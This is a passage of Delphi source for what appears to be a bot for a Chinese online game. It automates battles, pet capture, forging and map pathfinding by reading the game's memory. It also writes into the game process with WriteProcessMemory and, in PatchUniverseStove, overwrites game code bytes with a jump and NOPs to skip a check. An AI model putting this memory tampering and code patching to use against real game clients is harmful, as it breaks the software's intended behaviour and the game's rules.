TBattle.GetBattleExpForLevel(Level: integer): integer; var i: integer; dExp: double; iExp: integer; lvlDif: integer; tmpCreature: CreatureInfo; begin TotalExp := 0; for i := 0 to CreatureCount - 1 do begin tmpCreature:=Creatures.Items[i]; if tmpCreature.ID>=$C0000000 then begin dExp := tmpCreature.Level * tmpCreature.Level * 0.012; iExp := Ceil(dExp) + tmpCreature.Level * 5; if (Level > tmpCreature.Level) then begin lvlDif := Level - tmpCreature.Level; if lvlDif > 95 then lvlDif := 95; dExp := iExp * (100 - lvlDif) / 100; iExp := Ceil(dExp); end; TotalExp := TotalExp + iExp; end; end; Result := TotalExp; end; function TBattle.FindMonsterToAct(IsPetAction:Boolean=False):DWORD; var i:integer; tmpCreature:CreatureInfo; begin Result:=0; GetCreatures; for i:=0 to CreatureCount-1 do begin tmpCreature:=Creatures.Items[i]; if tmpCreature.ID>=$C0000000 then // 说明是敌怪 begin if not tmpCreature.IsDead then // 还没有死 begin if IsPetAction then // 是宠物的动作 begin if CurrHumanAction=BattleCapture then // 如果人物要捉宠 begin if tmpCreature.Name<>MonsterNameToCapture // 现在这个宠不是人物要捉的 then begin Result:=tmpCreature.ID; break; end else // 名字对应上了,继续测试 begin if (tmpCreature.Level>CaptureLevelTo) or (tmpCreature.Level<CaptureLevelFrom) then begin Result:=tmpCreature.ID; break; end; end; end else // 人物不捉宠 begin Result:=tmpCreature.ID; break; end; end else // 是人物的动作 begin if CurrHumanAction=BattleCapture then // 如果人物要捉宠 begin if tmpCreature.Name=MonsterNameToCapture // 现在这个宠的名字对应上了 then begin if (tmpCreature.Level<=CaptureLevelTo) and (tmpCreature.Level>=CaptureLevelFrom) then begin Result:=tmpCreature.ID; break; end; end; end else // 人物不捉宠 begin Result:=tmpCreature.ID; break; end; end; end; end; end; end; procedure TBattle.ReadOrders; begin ReadFromHLMEM(Pointer(BattleOrderAddr), @BattleBufferOrder, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + 4), @BattleBufferHumanAct, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + 8), @BattleBufferHumanActObj, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $c), @BattleBufferRemain1, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $10), @BattleBufferRemain1a, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $14), @BattleBufferPetAct, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $18), @BattleBufferPetActObj, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $1c), @BattleBufferRemain2a, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $20), @BattleBufferRemain2, 4); ReadFromHLMEM(Pointer(BattleOrderAddr + $24), @BattleBufferTimer, 4); end; procedure TBattle.WriteOrders; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; begin ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle<>0 then begin WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+4), @BattleBufferHumanAct, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+8), @BattleBufferHumanActObj, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+$c), @BattleBufferRemain1, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+$10), @BattleBufferRemain1a, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+$14), @BattleBufferPetAct, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+$18), @BattleBufferPetActObj, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+$1c), @BattleBufferRemain2a, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr+$20), @BattleBufferRemain2, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(BattleOrderAddr), @BattleBufferOrder, 4, lpNumberOfBytes); end; CloseHandle(ProcessHandle); end; function TBattle.ReadDeadMonsterCount: integer; begin ReadFromHLMem(Pointer(DeadMonsterCountAddr), @DeadMonsterCount, 4); end; function TBattle.ReadState: integer; var tmpByte: Byte; begin ReadFromHLMem(Pointer(BattleStateAddr), @tmpByte, 1); Result:= tmpByte; end; procedure TBattle.SubmitAction; var tmpWIn: TWindowInfo; begin if HLInfoList.GlobalHL.LocateToPlayWindow(tmpWIn) = -1 then Exit; // 没有找到 SendMessage(tmpWIn.Window, $7E8, $3EA, 0); end; procedure TBattle.DoBattle; var tmpPet: TPet; expToGain: integer; useItemId: DWORD; doHeal,healPlayer,healPet: Boolean; tmpPetId: DWORD; tmpCreature: CreatureInfo; playerLifePerc, petLifePerc: Double; begin if GetUserEnvState <> UserEnvBattle then Exit; if ReadState<>1 then Exit; sleep(100); ReadOrders; if (BattleBufferOrder<>0) or (BattleBufferHumanAct<>BattleIdle) or (BattleBufferPetAct<>BattleIdle) then Exit; // Action in Process if (BattleBufferTimer>30) or (BattleBufferTimer<0) then Exit; ThisUser.GetPets; GetCreatures; If LiveMonsterCount=0 then Exit; CurrHumanAction:=OrderHumanAction; CurrPetAction:=OrderPetAction; if not FormGeneralSet.CheckBoxNoHeal.Checked then begin doHeal := False; healPlayer := False; healPet := False; tmpPet := ThisUser.Pets[ThisUser.BattlePetPos]; if FormGeneralSet.CheckBoxFullBlood.Checked then begin expToGain := GetBattleExpForLevel(tmpPet.Level); if (tmpPet.Experience + expToGain > tmpPet.NextLevel) and (tmpPet.CurrLife < tmpPet.MaxLife) and (LiveMonsterCount = 1) then begin doHeal := True; healPet := True; end; end; //check pet life petLifePerc := tmpPet.CurrLife / tmpPet.MaxLife * 100; if (petLifePerc < StrToFloat(FormGeneralSet.EditPetLife.Text)) and (tmpPet.CurrLife > 0) then begin doHeal := True; healPet := True; end; //check player life ThisUser.GetAttr; playerLifePerc := ThisUser.CurrLife / ThisUser.MaxLife * 100; if (playerLifePerc < StrToFloat(FormGeneralSet.EditPlayerLife.Text)) and (ThisUser.CurrLife > 0) then begin doHeal := True; healPlayer := True; end; //Run if pet died tmpPetId := GetMyPetBattleID(tmpPet); tmpCreature := GetCreatureById(tmpPetId); if (tmpCreature <> nil) and (tmpCreature.IsDead) then begin CurrHumanAction := BattleEscape; doHeal := False; end else begin if doHeal then begin //get item useItemId := ThisUser.FindItemByType(700); if useItemId = 0 then begin CurrHumanAction := BattleEscape; doHeal := False; end else begin CurrHumanAction := BattleEat; end; end; end; end; if CurrHumanAction=BattleCapture then // Capture begin if ThisUser.PetCount=5 then // 如果捉宠,人物宠空满了 begin if EscapeWhenNoMonsterToCapture then // 要逃跑 begin CurrHumanAction:=BattleEscape; CurrPetAction:=BattleIdle; end else // 还要继续战斗 begin CurrHumanAction:=BattleAttack; end; end; end; if CurrHumanAction=BattleEscape then CurrPetAction:=BattleIdle; ReadOrders; BattleBufferHumanActObj:=0; BattleBufferPetActObj:=0; BattleBufferOrder:=$2710; if CurrHumanAction=BattleCapture then // 捉宠 begin BattleBufferHumanActObj:=FindMonsterToAct; if BattleBufferHumanActObj=0 then // 没有找到要抓的怪,根据用户设置的情况 begin if EscapeWhenNoMonsterToCapture then // 要逃跑 begin CurrHumanAction:=BattleEscape; CurrPetAction:=BattleIdle; end else // 还要继续战斗 begin CurrHumanAction:=BattleAttack; end; end; end; if CurrHumanAction = BattleEat then begin if healPlayer then BattleBufferHumanActObj := ThisUser.ID; if healPet then BattleBufferHumanActObj := GetMyPetBattleID(ThisUser.Pets[ThisUser.BattlePetPos]); BattleBufferRemain1 := useItemId; CurrPetAction := BattleDefence; end; if CurrHumanAction=BattleAttack then begin BattleBufferHumanActObj:=FindMonsterToAct; if BattleBufferHumanActObj=0 then Exit; // 出错了 end; if CurrPetAction=BattleAttack then begin BattleBufferPetActObj:=FindMonsterToAct(True); if BattleBufferPetActObj=0 // 如果没有找到宠,通常是发生在所有的宠都满足人物要捉的条件 then CurrPetAction:=BattleDefence; end; BattleBufferHumanAct := CurrHumanAction; if (BattleBufferHumanAct = BattleDefence) OR (BattleBufferHumanAct = BattleEscape) then BattleBufferHumanActObj := 0; BattleBufferPetAct := CurrPetAction; if BattleBufferPetAct <> BattleAttack then BattleBufferPetActObj := 0; if GetUserEnvState<>UserEnvBattle then Exit; GetCreatures; If LiveMonsterCount=0 then Exit; WriteOrders; //SubmitAction; sleep(100); end; //============================================================================== constructor TMove.Create; begin Inherited Create; Dijksatra_Nodes := TList.Create; Path := TList.Create; PathNodeIndex := 0; // PathNodeCount := 0; end; destructor TMove.Destroy; var // tmpNode: TNodeInfo; tmpDijksatraNode: DijksatraNodeInfo; i: integer; begin { for i := 0 to Path.Count - 1 do begin tmpNode := Path.Items[i]; dispose(tmpNode); end; } Path.Clear; Path.Free; for i := 0 to Dijksatra_Nodes.Count - 1 do begin tmpDijksatraNode := Dijksatra_Nodes.Items[i]; tmpDijksatraNode.OutNodes.Clear; tmpDijksatraNode.OutNodes.Free; dispose(tmpDijksatraNode); end; Dijksatra_Nodes.Clear; Dijksatra_Nodes.Free; Inherited Destroy; end; function TMove.Init(FromPos, ToPos: integer): Boolean; // 初始化移动对象 begin PathNodeIndex := 0; FromMapIndexInList := FromPos; ToMapIndexInList := ToPos; Result := FindPath; // 寻找路径 end; function TMove.GetPathNodeCount: integer; begin Result := self.Path.Count; end; function TMove.FindPath: Boolean; var i, j, tmpNewPNodeIndex: integer; tmpMap: TMapInfo; tmpNode: TNodeInfo; tmpDijksatraNode, tmpNewPNode: DijksatraNodeInfo; // ptmpID: ^DWord; tmpBoolean: Boolean; // tmpstr: String; Dijksatra_PNodes: TList; Dijksatra_TNodes: TList; begin Path.Clear; Result := True; // 起始点等于终点,退出 if FromMapIndexInList = ToMapIndexInList then Exit; if Dijksatra_Nodes.Count = 0 then // 初始化DijksatraPath begin for i := 0 to GameMaps.Count - 1 do begin tmpMap := GameMaps.Items[i]; if tmpMap.ID = 0 then GameMaps.ReadOneMap(i); // 如果ID非法,重新装载地图节点 new(tmpDijksatraNode); tmpDijksatraNode.PosInMapList := tmpMap.PosInMapList; tmpDijksatraNode.MapID := tmpMap.ID; Dijksatra_Nodes.Add(tmpDijksatraNode); end; for i := 0 to GameMaps.Count - 1 do begin tmpMap := GameMaps.Items[i]; tmpDijksatraNode := Dijksatra_Nodes.Items[i]; tmpDijksatraNode.OutNodes := TList.Create; for j := 0 to tmpMap.NodeList.Count-1 do begin tmpNode := tmpMap.NodeList.Items[j]; tmpDijksatraNode.OutNodes.Add(tmpNode); end; end; end; Dijksatra_PNodes:=TList.Create; Dijksatra_TNodes:=TList.Create; Dijksatra_PNodes.Clear; Dijksatra_TNodes.Clear; // 开始执行算法 // 初始化 for i:=0 to Dijksatra_Nodes.Count-1 do begin tmpDijksatraNode:=Dijksatra_Nodes.Items[i]; if i = FromMapIndexInList then begin tmpDijksatraNode.distance:=0; tmpDijksatraNode.priorNode:=Nil; tmpDijksatraNode.priorDijksatraNode:=nil; Dijksatra_PNodes.Add(tmpDijksatraNode); end else begin tmpDijksatraNode.distance:=-1; Dijksatra_TNodes.Add(tmpDijksatraNode); end; end; repeat tmpNewPNode:=Dijksatra_PNodes.Items[Dijksatra_PNodes.Count-1]; // 新增加的那个 for i:=0 to tmpNewPNode.OutNodes.Count-1 do begin tmpNode:=tmpNewPNode.OutNodes.Items[i]; tmpBoolean:=False; for j:=0 to Dijksatra_TNodes.Count-1 do begin tmpDijksatraNode:=Dijksatra_TNodes.Items[j]; if tmpNode.OutMapID=tmpDijksatraNode.MapID then begin tmpBoolean:=True; break; end; end; if tmpBoolean then // Node在TNodes中 begin if (tmpNewPNode.distance<>-1) and (((tmpNewPNode.distance+1)<tmpDijksatraNode.distance) or (tmpDijksatraNode.distance=-1)) then begin // 更新tmpOutNode的Distance tmpDijksatraNode.distance:=tmpNewPNode.distance+1; tmpDijksatraNode.PriorNode:=tmpNode; for j:=0 to Dijksatra_PNodes.Count-1 do begin tmpNewPNode:=Dijksatra_PNodes.Items[j]; if tmpNewPNode.MapID=tmpNode.MyMap.ID then begin tmpDijksatraNode.priorDijksatraNode:=tmpNewPNode; break; end; end; end; end; end; if Dijksatra_TNodes.Count <> 0 then begin tmpNewPNodeIndex := 0; tmpNewPNode := Dijksatra_TNodes.Items[0]; for i := 1 to Dijksatra_TNodes.Count - 1 do begin tmpDijksatraNode := Dijksatra_TNodes.Items[i]; if (tmpDijksatraNode.distance <> -1) and ((tmpNewPNode.distance = -1) or (tmpDijksatraNode.distance < tmpNewPNode.distance)) then begin // 找到新的PNode tmpNewPNodeIndex := i; tmpNewPNode := tmpDijksatraNode; end; end; Dijksatra_TNodes.Delete(tmpNewPNodeIndex); Dijksatra_PNodes.Add(tmpNewPNode); end; until Dijksatra_TNodes.Count = 0; tmpDijksatraNode := Dijksatra_Nodes[ToMapIndexInList]; repeat if tmpDijksatraNode.distance = -1 then begin Result := False; Exit; end; tmpNode := tmpDijksatraNode.priorNode; Path.Insert(0, tmpNode); tmpDijksatraNode := tmpDijksatraNode.priorDijksatraNode; until tmpDijksatraNode.priorDijksatraNode = Nil; // PathNodeCount := Path.Count; Dijksatra_PNodes.Clear; Dijksatra_TNodes.Clear; Dijksatra_PNodes.Free; Dijksatra_TNodes.Free; end; function TMove.GetCurrPathNode: TNodeInfo; // 返回当前路径节点 begin Result := Path[PathNodeIndex]; end; function TMove.GetCurrPathNodeIndex: integer; // 返回当前路径节点编号 begin Result := PathNodeIndex; end; procedure TMove.GotoNextPathNode; // 指向下一个路径节点 begin PathNodeIndex := PathNodeIndex + 1; end; constructor TForge.Create; begin Inherited Create; StoveList := TList.Create; StoveList.Clear; end; destructor TForge.Destroy; begin Clean; StoveList.Free; Inherited Destroy; end; procedure TForge.Clean; var i, j, k: integer; tmpStove: StoveInfo; tmpAllowedStuffType: AllowedStuffTypeInfo; begin for i:=0 to StoveList.Count-1 do begin tmpStove:=StoveList.Items[i]; for j:=0 to 7 do begin for k:=0 to tmpStove.Rooms[j].AllowedStuffTypes.Count-1 do begin tmpAllowedStuffType:=tmpStove.Rooms[j].AllowedStuffTypes.Items[k]; dispose(tmpAllowedStuffType); end; tmpStove.Rooms[j].AllowedStuffTypes.Clear; tmpStove.Rooms[j].AllowedStuffTypes.Free; end; dispose(tmpStove); end; StoveList.Clear; StoveCount:=0; StoveIndex:=0; end; Procedure TForge.Init; var mapini:TIniFile; i, j, k, tmpint, tmpint2: integer; tmpTransaction: TTransaction; tmpStep: TStepInfo; tmpString: String; tmpStove: StoveInfo; tmpAllowedStuffType: AllowedStuffTypeInfo; begin Clean; tmpTransaction := ThisWork.GetCurrTransaction; tmpStep := tmpTransaction.GetCurrStep; mapini := TIniFile.Create('.\' + ThisWork.IniFileName); try tmpint := mapini.ReadInteger(tmpStep.X, 'StoveCount', 0); for i := 0 to tmpint - 1 do begin new(tmpStove); tmpString := mapini.ReadString(tmpStep.X, format('Stove%d', [i]), ''); tmpStove.MainRoomPos := mapini.ReadInteger(tmpString, 'MainRoomPos', -1); for j := 0 to 7 do begin tmpStove.Rooms[j].AllowedStuffTypes := TList.Create; tmpStove.Rooms[j].AllowedStuffTypes.Clear; tmpint2 := mapini.ReadInteger(tmpString, format('Room%d_AllowedStuffTypeCount', [j]), 0); for k := 0 to tmpint2 - 1 do begin new(tmpAllowedStuffType); tmpAllowedStuffType.Name := mapini.ReadString(tmpString, format('Room%d_AllowedStuffType%d_Name', [j, k]), ''); tmpAllowedStuffType.Attr := mapini.ReadInteger(tmpString, format('Room%d_AllowedStuffType%d_Attr', [j, k]), -1); tmpAllowedStuffType.Maker := mapini.ReadString(tmpString, format('Room%d_AllowedStuffType%d_Maker', [j, k]), ''); if tmpAllowedStuffType.Maker = '[username]' then tmpAllowedStuffType.Maker := HLInfoList.GlobalHL.UserName; tmpStove.Rooms[j].AllowedStuffTypes.Add(tmpAllowedStuffType); end; end; StoveList.Add(tmpStove); end; StoveCount := StoveList.Count; finally mapini.Free; end; end; procedure TForge.WriteStoveInstruction; var AddressofUniverseStoveForm: DWORD; lpNumberOfBytes: SIZE_T; ProcessHandle: THandle; tmpStove: StoveInfo; i: integer; begin tmpStove:=StoveList[StoveIndex]; ReadFromHLMEM(Pointer(HL_UniverseStoveFormAddressAddress), @AddressofUniverseStoveForm, 4); ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle <> 0 then begin //CN @ $458 WriteProcessMemory(ProcessHandle, Pointer(AddressofUniverseStoveForm + $450), @tmpStove.MainRoomPos, 4, lpNumberOfBytes); //CN @ $3f8 for i := 0 to 7 do begin WriteProcessMemory(ProcessHandle, Pointer(AddressofUniverseStoveForm + $3f0 + i * 12), @tmpStove.Rooms[i].Stuff.StuffAttr, 4, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer(AddressofUniverseStoveForm + $3f0 + i * 12 + 8), @tmpStove.Rooms[i].Stuff.StuffID, 4, lpNumberOfBytes); end; end; CloseHandle(ProcessHandle); end; procedure TForge.PatchUniverseStove; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; Buffers: array [0..5] of Byte; i: integer; begin Buffers[0] := $0f; Buffers[1] := $85; // Buffers[2] := $44; // Buffers[3] := $02; Buffers[2] := $2F; Buffers[3] := $02; Buffers[4] := $00; Buffers[5] := $00; ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle<>0 then begin for i := 0 to 5 do begin //WriteProcessMemory(ProcessHandle, Pointer($459d8b + i), @Buffers[i], 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($472DEF + i), @Buffers[i], 1, lpNumberOfBytes); end; Buffers[0] := $90; for i := 0 to 7 do begin //WriteProcessMemory(ProcessHandle, Pointer($556b07 + i), @Buffers[0], 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($55788E + i), @Buffers[0], 1, lpNumberOfBytes); end; end; CloseHandle(ProcessHandle); end; procedure TForge.UnpatchUniverseStove; var ProcessHandle: THandle; lpNumberOfBytes: SIZE_T; Buffers: array [0..7] of Byte; i: integer; tmpWin: TWindowInfo; begin Buffers[0]:=$75; Buffers[1]:=$61; Buffers[2]:=$66; Buffers[3]:=$c7; Buffers[4]:=$45; Buffers[5]:=$d0; ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, HLInfoList.GlobalHL.ProcessId); if ProcessHandle<>0 then begin for i:=0 to 5 do begin // WriteProcessMemory(ProcessHandle, Pointer($459d8b+i), @Buffers[i], 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($472DEF+i), @Buffers[i], 1, lpNumberOfBytes); end; Buffers[0] := $e8; //Buffers[1] := $88; //Buffers[2] := $83; Buffers[1] := $11; Buffers[2] := $1c; Buffers[3] := $05; Buffers[4] := $00; Buffers[5] := $83; Buffers[6] := $c4; Buffers[7] := $08; for i := 0 to 7 do begin //WriteProcessMemory(ProcessHandle, Pointer($556b07+i), @Buffers[i], 1, lpNumberOfBytes); WriteProcessMemory(ProcessHandle, Pointer($55788E+i), @Buffers[i], 1, lpNumberOfBytes); end; end; CloseHandle(ProcessHandle); tmpWin := HLInfoList.GlobalHL.ItemOfWindowTitle('Wuxing Oven'); if tmpWin <> nil then if IsWindow(tmpWin.Window) and (not IsWindowVisible(tmpWin.Window)) then SendMessage(tmpWin.Window, WM_Close, 0, 0); end; function TForge.GetCurrStove: StoveInfo; begin Result:=StoveList[StoveIndex]; end; function TForge.FillStove: Boolean; var tmpStove: StoveInfo; tmpAllowedStuffType: AllowedStuffTypeInfo; isFoundForOneTime: Boolean; i, j, k: integer; begin Result:=True; tmpStove:=StoveList[StoveIndex]; For i:=0 to 7 do begin isFoundForOneTime:=False; for j:=0 to tmpStove.Rooms[i].AllowedStuffTypes.Count-1 do begin tmpAllowedStuffType:=tmpStove.Rooms[i].AllowedStuffTypes[j]; for k:=0 to StoveStuffsToBeChozenCount-1 do begin if (StoveStuffsToBeChozen[k].ChozenBy=-1) and (tmpAllowedStuffType.Name=StoveStuffsToBeChozen[k].Stuff.Name) and (tmpAllowedStuffType.Attr=StoveStuffsToBeChozen[k].Stuff.ItemType) and (tmpAllowedStuffType.Maker=StoveStuffsToBeChozen[k].Stuff.Maker) then begin tmpStove.Rooms[i].Stuff.StuffID:=StoveStuffsToBeChozen[k].Stuff.ID; tmpStove.Rooms[i].Stuff.StuffAttr:=$4d6; StoveStuffsToBeChozen[k].ChozenBy:=i; isFoundForOneTime:=True; if tmpStove.tmpID1=0 then tmpStove.tmpID1:=tmpStove.Rooms[i].Stuff.StuffID else if tmpStove.tmpID2=0 then tmpStove.tmpID2:=tmpStove.Rooms[i].Stuff.StuffID; break; end; end; if isFoundForOneTime then break; end; if (tmpStove.Rooms[i].AllowedStuffTypes.Count<>0) and (not isFoundForOneTime) then begin Result:=False; break; end; end; end; function TForge.HasCurrStoveFinished: Boolean; var tmpStove: StoveInfo; isFoundForOneTime: Boolean; i: integer; begin Result:=True; tmpStove:=StoveList[StoveIndex]; ThisUser.GetItems; isFoundForOneTime:=False; for i:=0 to ThisUser.ItemCount do begin if ThisUser.Items[i].ID=tmpStove.tmpID1 then begin isFoundForOneTime:=True; break; end; end; for i:=0 to ThisUser.ItemCount do begin if ThisUser.Items[i].ID=tmpStove.tmpID2 then begin if isFoundForOneTime then Result:=False; break; end; end; end; function TForge.IsFinish: Boolean; begin Result:=(StoveIndex>=StoveCount); end; procedure TForge.GotoNextStove; begin StoveIndex:=StoveIndex+1; end; procedure TForge.InitStoveStuffsToBeChozen; // 先不处理炼化宠物情况 var i, j: integer; begin ThisUser.GetItems; j:=0; for i:=0 to ThisUser.ItemCount-1 do begin if (ThisUser.Items[i].Name='※乾坤袋') or (ThisUser.Items[i].Name='※百宝囊') then continue; StoveStuffsToBeChozen[j].Stuff:=ThisUser.Items[i]; StoveStuffsToBeChozen[j].ChozenBy:=-1; j:=j+1; end; StoveStuffsToBeChozenCount:=j; end; procedure TUser.GetAttr; begin ReadFromHLMEM(Pointer(UserIdAddress), @ID, 2); ReadFromHLMEM(Pointer(UserXianmo_1Xian_2Mo), @Xianmo, 2); ReadFromHLMEM(Pointer(UserAttribTiliAddr), @Tili, 2); ReadFromHLMEM(Pointer(UserAttribNeigongAddr), @Neigong, 2); ReadFromHLMEM(Pointer(UserAttribGongjiAddr), @Gongji, 2); ReadFromHLMEM(Pointer(UserAttribFangyuAddr), @Fangyu, 2); ReadFromHLMEM(Pointer(UserAttribQinggongAddr), @Qinggong, 2); ReadFromHLMEM(Pointer(UserAttribRemainingAddr), @RemainingPoints, 2); ReadFromHLMEM(Pointer(UserLifeCurrAddr), @CurrLife, 2); ReadFromHLMEM(Pointer(UserLifeMaxAddr), @MaxLife, 2); ReadFromHLMEM(Pointer(UserNeiliCurrAddr), @CurrNeili, 2); ReadFromHLMEM(Pointer(UserNeiliMAXAddr), @MaxNeili, 2); ReadFromHLMEM(Pointer(UserMoneyAddress), @Money, 4); ReadFromHLMEM(Pointer(UserRankAddr), @Rank, 2); ReadFromHLMEM(Pointer(UserLevelAddr), @Level, 2); Xiu_Level:=0; if Rank>=2 then begin ReadFromHLMEM(Pointer(UserBaseXiuAddr), @Xiu_Level, 4); Xiu_Level:=Xiu_Level+Level; end; end; function TUser.FindPetCount(Name: String; Loyal: WORD): integer; var i: integer; begin Result:=0; GetPets; for i:=0 to PetCount-1 do begin if ((Pets[i].Name=Name) or (Name='')) and (Pets[i].Loyal>=Loyal) then begin Result:=Result+1; end; end; end; procedure TUser.GetWGs; var i, j:integer; pCurrWG: DWORD; WGBuffer: array [0.. UserWGDataLength-1] of Byte; CharArrayTemp: array [0.. 15] of Char; tmp: DWORD; // tmpext: Extended; begin ReadFromHLMEM(Pointer(UserWGCountAddress), @tmp, 4); WGCount:=tmp; for i:=0 to WGCount-1 do begin pCurrWG:=GetHLMemListNumberByNo(i, UserFirstWGAddressAddress, $67295C); ReadFromHLMEM(Pointer(pCurrWG), @WGBuffer, UserWGDataLength); for j:=0 to 15 do CharArrayTemp[j]:=Char(WGBuffer[j]); WGs[i].Name:=CharArrayTemp; for j:=0 to 15 do CharArrayTemp[j]:=Char(WGBuffer[$10+j]); WGs[i].Creator:=CharArrayTemp; WGs[i].ID:=Byte(WGBuffer[$27])*65536*256+Byte(WGBuffer[$26])*65536 +Byte(WGBuffer[$25])*256+Byte(WGBuffer[$24]); WGs[i].QS:=Byte(WGBuffer[$28])+1; WGs[i].GJ:=Byte(WGBuffer[$2c])+1; WGs[i].BZ:=Byte(WGBuffer[$30])+1; WGs[i].LevelNeed:=Byte(WGBuffer[$35])*256+Byte(WGBuffer[$34]); WGs[i].Neili:=Byte(WGBuffer[$39])*256+Byte(WGBuffer[$38]); WGs[i].DisplayXishuMultiply100:=Byte(WGBuffer[$3c]); WGs[i].Real_DisplayXishuPercent:=Byte(WGBuffer[$4c]); WGs[i].Jingyan:=Byte(WGBuffer[$69])*256+Byte(WGBuffer[$68]); end; GetAttr; if Rank < 1 then WGCountLimit:=5 // 凡人为5个 else if Rank < 2 then WGCountLimit:=8 // 散仙为8个 else WGCountLimit:=10; // 其它为10个 end; procedure TUser.GetPets; var i, j:integer; pCurrPet: DWORD; PetBuffer: array [0..UserPetSize-1] of Byte; CharArrayTemp: array[0..15] of Char; begin ReadFromHLMEM(Pointer(UserPetCountAddress), @PetCount, 4); for i:=0 to PetCount-1 do begin pCurrPet:=GetHLMemListNumberByNo(i, UserFirstPetAddressAddress, $00672954); ReadFromHLMEM(Pointer(pCurrPet), @PetBuffer, UserPetSize); if PetBuffer[$B0]=1 then BattlePetPos:=i; for j:=0 to 15 do CharArrayTemp[j]:=Char(PetBuffer[j+4]); Pets[i].Name:=CharArrayTemp; Pets[i].ID:=PetBuffer[$93]*65536*256+PetBuffer[$92]*65536 +PetBuffer[$91]*256+PetBuffer[$90]; Pets[i].Level:=PetBuffer[$39]*256+PetBuffer[$38]; Pets[i].Loyal:=PetBuffer[$94]; Pets[i].Experience:=PetBuffer[$3F]*65536*256+PetBuffer[$3E]*65536 +PetBuffer[$3D]*256+PetBuffer[$3C]; Pets[i].NextLevel:= Floor((Pets[i].Level+1) * Pets[i].Level * 0.75); Pets[i].CurrLife:=PetBuffer[$43]*65536*256+PetBuffer[$42]*65536 +PetBuffer[$41]*256+PetBuffer[$40]; Pets[i].MaxLife:=PetBuffer[$47]*65536*256+PetBuffer[$46]*65536 +PetBuffer[$45]*256+PetBuffer[$44]; Pets[i].Attack:=PetBuffer[$1F]*65536*256+PetBuffer[$1E]*65536 +PetBuffer[$1D]*256+PetBuffer[$1C]; Pets[i].Defence:=PetBuffer[$23]*65536*256+PetBuffer[$22]*65536 +PetBuffer[$21]*256+PetBuffer[$20]; Pets[i].Dexterity:=PetBuffer[$27]*65536*256+PetBuffer[$26]*65536 +PetBuffer[$25]*256+PetBuffer[$24]; Pets[i].MedalAttack:=PetBuffer[$87]*65536*256+PetBuffer[$86]*65536 +PetBuffer[$85]*256+PetBuffer[$84]; Pets[i].MedalDefence:=PetBuffer[$8B]*65536*256+PetBuffer[$8A]*65536 +PetBuffer[$89]*256+PetBuffer[$88]; Pets[i].MedalDexterity:=PetBuffer[$8F]*65536*256+PetBuffer[$8E]*65536 +PetBuffer[$8D]*256+PetBuffer[$8C]; end; end; function TUser.GetMarchingPet(): TPet; begin GetPets; Result := Pets[BattlePetPos]; end; function TUser.FindPetPos(Name: String; Loyal: integer): integer; // 从 1 开始,0说明没有找到 var i: integer; begin Result:=0; GetPets; for i:=0 to PetCount-1 do begin If (Pets[i].Name=Name) and (Pets[i].Loyal>=Loyal) then begin Result:=i+1; break; end; end; end; function TUser.FindItemPos(Name: String; Maker: String): integer; // 从 1 开始,0说明没有找到 var i: integer; begin Result:=0; GetItems; for i:=0 to ItemCount-1 do begin If (Items[i].Name=Name) and (Items[i].Maker=Maker) then begin Result:=i+1; break; end; end; end; function TUser.FindItemPosByID(ID: DWORD): integer; // 从 1 开始,0说明没有找到 var i: integer; begin Result:=0; GetItems; for i:=0 to ItemCount-1 do begin If Items[i].ID=ID then begin Result:=i+1; break; end; end; end; function TUser.FindItemID(Name: String; Maker: String): DWORD; // 0说明没有找到 var i: integer; begin Result:=0; GetItems; for i:=0 to ItemCount-1 do begin If (Items[i].Name=Name) and (Items[i].Maker=Maker) then begin Result:=Items[i].ID; break; end; end; end; function TUser.FindItemByType(ItemType: DWORD): DWORD; var i: integer; begin Result:=0; GetItems; for i:=0 to ItemCount-1 do begin If (Items[i].ItemType=ItemType) then begin Result:=Items[i].ID; break; end; end; end; function TUser.FindItemCount(Name: String; Maker: String): integer; var i: integer; begin Result:=0; GetItems; for i:=0 to ItemCount-1 do begin If Name='' then begin // 只判断Maker if Items[i].Maker=Maker then Result:=Result+1; end else if Maker='' then begin // 只判断Name if Items[i].Name=Name then Result:=Result+1; end else // 两个都要判断 begin if (Items[i].Name=Name) and (Items[i].Maker=Maker) then Result:=Result+1; end; end; end; procedure TUser.GetItems; var i, j:integer; pCurrItem: DWORD; ItemBuffer: array [0.. UserItemInfoSize-1] of AnsiChar; CharArrayTemp: array [0.. 15] of AnsiChar; tmp: DWORD; begin ReadFromHLMEM(Pointer(UserItemCountAddress), @tmp, 4); ItemCount:=tmp; for i:=0 to ItemCount-1 do begin //6715FC pCurrItem:=GetHLMemListNumberByNo(i, UserFirstItemAddressAddress, $0066824C); ReadFromHLMEM(Pointer(pCurrItem), @ItemBuffer, UserItemInfoSize); for j:=0 to 15 do CharArrayTemp[j]:=ItemBuffer[j]; 